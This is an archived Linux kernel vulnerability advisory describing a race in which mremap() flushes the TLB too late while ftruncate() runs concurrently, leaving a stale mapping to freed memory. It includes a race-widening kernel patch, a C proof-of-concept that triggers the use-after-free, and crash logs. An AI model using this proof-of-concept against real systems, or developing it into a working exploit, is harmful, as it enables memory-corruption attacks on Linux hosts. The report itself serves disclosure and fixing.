Lucene search

packetstormJann HornPACKETSTORM:150001
HistoryOct 29, 2018 - 12:00 a.m.

Linux mremap() TLB Flush Too Late

Jann Horn





`Linux: mremap() TLB flush too late with concurrent ftruncate()   
Tested on the master branch (4.19.0-rc7+).  
sys_mremap() takes current->mm->mmap_sem for writing, then calls  
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first  
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE  
locks) in a loop, then performs a TLB flush with flush_tlb_range().  
move_ptes() can also perform TLB flushes, but only when dirty PTEs are  
encountered - non-dirty, accessed PTEs don't trigger such early flushes.  
Between the move_ptes() loop and the TLB flush, the only lock being  
held in move_page_tables() is current->mm->mmap_sem.  
->zap_page_range_single() can concurrently access the page tables of a  
process that is in move_page_tables(), between the move_ptes() loop  
and the TLB flush.  
The following race can occur in a process with three threads A, B and C:  
A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED  
C: starts reading from address X in a busyloop  
A: starts an mremap() call that remaps from X to Y; syscall progresses  
until directly before the flush_tlb_range() call in  
[at this point, the PTE for X is gone, but C still has a read-only TLB  
entry for X; the PTE for Y has been created]  
B: uses sys_ftruncate() to change the file size to zero. this removes  
the PTE for address Y, then sends a TLB flush IPI *for address Y*.  
TLB entries *for address X* stays alive.  
The kernel now assumes that the page is not referenced by any  
userspace task anymore, but actually, thread C can still use the stale  
TLB entry at address X to read from it.  
At this point, the page can be freed as soon as it disappears from the  
LRU list (which I don't really understand); it looks like there are  
various kernel interfaces that can be used to trigger  
lru_add_drain_all(). For simplicitly, I am using root privileges to  
write to /proc/sys/vm/compact_memory in order to trigger this.  
To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,  
CONFIG_PREEMPT=y, CONFIG_PAGE_POISONING=y, and used the kernel  
commandline flag "page_poison=1". I patched the kernel as follows to  
widen the race window (and make debugging easier). A copy of the patch  
is attached.  
diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c  
index e96b99eb800c..8156628a6204 100644  
--- a/arch/x86/mm/tlb.c  
+++ b/arch/x86/mm/tlb.c  
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)  
if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))  
+ if (strcmp(current->comm, "race2") == 0) {  
+ pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",  
+ f->start, f->end);  
+ }  
flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);  
diff --git a/mm/compaction.c b/mm/compaction.c  
index faca45ebe62d..27594b4868ec 100644  
--- a/mm/compaction.c  
+++ b/mm/compaction.c  
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)  
int nid;  
+ pr_warn("compact_nodes entry\n");  
/* Flush pending updates to the LRU lists */  
+ pr_warn("compact_nodes exit\n");  
/* The written value is actually unused, all memory is compacted */  
diff --git a/mm/mremap.c b/mm/mremap.c  
index 5c2e18505f75..be34e0a7258e 100644  
--- a/mm/mremap.c  
+++ b/mm/mremap.c  
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,  
flush_tlb_range(vma, old_end - len, old_end);  
*need_flush = true;  
pte_unmap_unlock(old_pte - 1, old_ptl);  
if (need_rmap_locks)  
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,  
move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,  
new_pmd, new_addr, need_rmap_locks, &need_flush);  
- if (need_flush)  
+ if (need_flush) {  
+ if (strcmp(current->comm, "race") == 0) {  
+ int i;  
+ pr_warn("spinning before flush\n");  
+ for (i=0; i<100000000; i++) barrier();  
+ pr_warn("spinning before flush done\n");  
+ }  
flush_tlb_range(vma, old_end-len, old_addr);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("flush done\n");  
+ }  
+ }  
mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);  
diff --git a/mm/page_poison.c b/mm/page_poison.c  
index aa2b3d34e8ea..5ffe8b998573 100644  
--- a/mm/page_poison.c  
+++ b/mm/page_poison.c  
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)  
void *addr = kmap_atomic(page);  
+ if (*(unsigned long *)addr == 0x4141414141414141UL) {  
+ }  
memset(addr, PAGE_POISON, PAGE_SIZE);  
diff --git a/mm/shmem.c b/mm/shmem.c  
index 446942677cd4..838b5f77cc0e 100644  
--- a/mm/shmem.c  
+++ b/mm/shmem.c  
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)  
if (newsize <= oldsize) {  
loff_t holebegin = round_up(newsize, PAGE_SIZE);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("shmem_setattr entry\n");  
+ }  
if (oldsize > holebegin)  
holebegin, 0, 1);  
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)  
holebegin, 0, 1);  
+ if (strcmp(current->comm, "race") == 0) {  
+ pr_warn("shmem_setattr exit\n");  
+ }  
* Part of the huge page can be beyond i_size: subject  
* to shrink under memory pressure.  
Then, I ran the following testcase a few times (compile with  
"gcc -O2 -o race race.c -pthread"; note that the filename matters for  
the kernel patch):  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <stdio.h>  
#include <fcntl.h>  
#include <err.h>  
#include <unistd.h>  
#include <string.h>  
#include <sys/mman.h>  
#include <sys/prctl.h>  
#define ul unsigned long  
static int alloc_fd = -1;  
#define allocptr ((ul *)0x100000000000)  
#define allocptr2 ((ul *)0x100000002000)  
void *reader_fn(void *dummy) {  
prctl(PR_SET_NAME, "race2");  
while (1) {  
ul x = *(volatile ul *)allocptr;  
if (x != 0x4141414141414141UL) {  
printf("GOT 0x%016lx\n", x);  
void *truncate_fn(void *dummy) {  
if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");  
int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);  
if (sysctl_fd == -1) err(1, "unable to open sysctl");  
write(sysctl_fd, "1", 1);  
return 0;  
int main(void) {  
alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);  
if (alloc_fd == -1) err(1, "open");  
char buf[0x1000];  
memset(buf, 0x41, sizeof(buf));  
if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");  
if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");  
pthread_t reader;  
if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");  
pthread_t truncator;  
if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");  
if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");  
return 0;  
After a few attempts, I get the following output:  
user@debian:~/mremap_ftruncate_race$ sudo ./race  
GOT 0xaaaaaaaaaaaaaaaa  
Segmentation fault  
Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.  
dmesg reports:  
shmem_setattr entry  
shmem_setattr exit  
spinning before flush  
shmem_setattr entry  
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000  
shmem_setattr exit  
compact_nodes entry  
------------[ cut here ]------------  
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180  
Modules linked in: btrfs xor zstd_compress raid6_pq  
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G W 4.19.0-rc7+ #188  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014  
Workqueue: mm_percpu_wq lru_add_drain_per_cpu  
RIP: 0010:kernel_poison_pages+0x10a/0x180  
Call Trace:  
? __mod_zone_page_state+0x66/0xa0  
? pagevec_move_tail_fn+0x2b0/0x2b0  
? process_one_work+0x400/0x400  
? kthread_create_worker_on_cpu+0x70/0x70  
---[ end trace aed8d7b167ea0097 ]---  
compact_nodes exit  
spinning before flush done  
flush done  
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
Found by: jannh